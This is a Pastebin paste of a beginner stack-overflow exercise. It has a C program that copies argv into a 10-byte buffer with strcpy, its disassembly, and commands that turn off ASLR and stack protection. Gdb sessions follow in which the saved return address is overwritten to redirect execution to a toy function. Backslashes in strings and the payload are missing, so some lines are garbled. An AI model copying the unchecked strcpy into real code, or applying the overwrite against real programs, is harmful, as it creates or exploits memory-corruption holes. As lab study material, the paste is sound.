API tools faq
paste
Guest User

Untitled

a guest
Feb 20th, 2018
126
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.03 KB | None | 0 0
raw download clone embed print report
  1. #include <stdio.h>
  2. #include <string.h>
  3. void func(char *name)
  4. {
  5. char buf[10];
  6. strcpy(buf, name);
  7. }
  8. void chgflow(){
  9. printf("changed flow!!n");
  10. }
  11. void main(int argc, char *argv[])
  12. {
  13. func(argv[1]);
  14. printf("i should not be viewed if flow is changedn");
  15. chgflow();
  16. }
  17.  
  18. <main>:
  19. 5a3: 8d 4c 24 04 lea 0x4(%esp),%ecx
  20. 5a7: 83 e4 f0 and $0xfffffff0,%esp
  21. 5aa: ff 71 fc pushl -0x4(%ecx)
  22. 5ad: 55 push %ebp
  23. 5ae: 89 e5 mov %esp,%ebp
  24. 5b0: 53 push %ebx
  25. 5b1: 51 push %ecx
  26. 5b2: e8 99 fe ff ff call 450 <__x86.get_pc_thunk.bx>
  27. 5b7: 81 c3 49 1a 00 00 add $0x1a49,%ebx
  28. 5bd: 89 c8 mov %ecx,%eax
  29. 5bf: 8b 40 04 mov 0x4(%eax),%eax
  30. 5c2: 83 c0 04 add $0x4,%eax
  31. 5c5: 8b 00 mov (%eax),%eax
  32. 5c7: 83 ec 0c sub $0xc,%esp
  33. 5ca: 50 push %eax
  34. 5cb: e8 7d ff ff ff call 54d <func>
  35. 5d0: 83 c4 10 add $0x10,%esp
  36. 5d3: 83 ec 0c sub $0xc,%esp
  37. 5d6: 8d 83 90 e6 ff ff lea -0x1970(%ebx),%eax
  38. 5dc: 50 push %eax
  39. 5dd: e8 fe fd ff ff call 3e0 <puts@plt>
  40. 5e2: 83 c4 10 add $0x10,%esp
  41. 5e5: e8 8e ff ff ff call 578 <chgflow>
  42. 5ea: 90 nop
  43. 5eb: 8d 65 f8 lea -0x8(%ebp),%esp
  44. 5ee: 59 pop %ecx
  45. 5ef: 5b pop %ebx
  46. 5f0: 5d pop %ebp
  47. 5f1: 8d 61 fc lea -0x4(%ecx),%esp
  48. 5f4: c3 ret
  49.  
  50. <func>:
  51. 54d: 55 push %ebp
  52. 54e: 89 e5 mov %esp,%ebp
  53. 550: 53 push %ebx
  54. 551: 83 ec 14 sub $0x14,%esp
  55. 554: e8 9c 00 00 00 call 5f5 <__x86.get_pc_thunk.ax>
  56. 559: 05 a7 1a 00 00 add $0x1aa7,%eax
  57. 55e: 83 ec 08 sub $0x8,%esp
  58. 561: ff 75 08 pushl 0x8(%ebp)
  59. 564: 8d 55 ee lea -0x12(%ebp),%edx
  60. 567: 52 push %edx
  61. 568: 89 c3 mov %eax,%ebx
  62. 56a: e8 61 fe ff ff call 3d0 <strcpy@plt>
  63. 56f: 83 c4 10 add $0x10,%esp
  64. 572: 90 nop
  65. 573: 8b 5d fc mov -0x4(%ebp),%ebx
  66. 576: c9 leave
  67. 577: c3 ret
  68.  
  69. <chgflow>:
  70. 578: 55 push %ebp
  71. 579: 89 e5 mov %esp,%ebp
  72. 57b: 53 push %ebx
  73. 57c: 83 ec 04 sub $0x4,%esp
  74. 57f: e8 71 00 00 00 call 5f5 <__x86.get_pc_thunk.ax>
  75. 584: 05 7c 1a 00 00 add $0x1a7c,%eax
  76. 589: 83 ec 0c sub $0xc,%esp
  77. 58c: 8d 90 80 e6 ff ff lea -0x1980(%eax),%edx
  78. 592: 52 push %edx
  79. 593: 89 c3 mov %eax,%ebx
  80. 595: e8 46 fe ff ff call 3e0 <puts@plt>
  81. 59a: 83 c4 10 add $0x10,%esp
  82. 59d: 90 nop
  83. 59e: 8b 5d fc mov -0x4(%ebp),%ebx
  84. 5a1: c9 leave
  85. 5a2: c3 ret
  86.  
  87. echo 0 > /proc/sys/kernel/randomize_va_space
  88.  
  89. gcc -m32 -g main.c -o main -fno-stack-protector
  90.  
  91. printf("i should not be viewed if flow is changedn");
  92.  
  93. gdb ./main
  94. go
  95. disas main
  96. disas chgflow
  97.  
  98. 0x565555cb <+40>: call 0x5655554d <func>
  99. 0x565555d0 <+45>: add $0x10,%esp
  100.  
  101. 0x565555d0 <+45>: add $0x10,%esp
  102.  
  103. 564: 8d 55 ee lea -0x12(%ebp),%edx
  104.  
  105. gdb ./main
  106. break 7
  107. run AAAAAAAAAAAAAAAAAAAAAA
  108.  
  109. (gdb) x/s $ebp-18
  110. 0xffffd2a6: 'A' <repeats 22 times>
  111. (gdb) x/s $ebp
  112. 0xffffd2b8: "AAAA"
  113. (gdb) x/x $ebp+4
  114. 0xffffd2bc: 0x00
  115.  
  116. (gdb) x/x $ebp+4
  117. 0xffffd2bc: 0x565555d0
  118.  
  119. run AAAAAAAAAAAAAAAAAAAAAx78x55x55x56
  120.  
  121. (gdb) x/x $ebp+4
  122. 0xffffd2ac: 0x37
  123. (gdb) x/s $ebp+4
  124. 0xffffd2ac: "78x55x55x56"
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!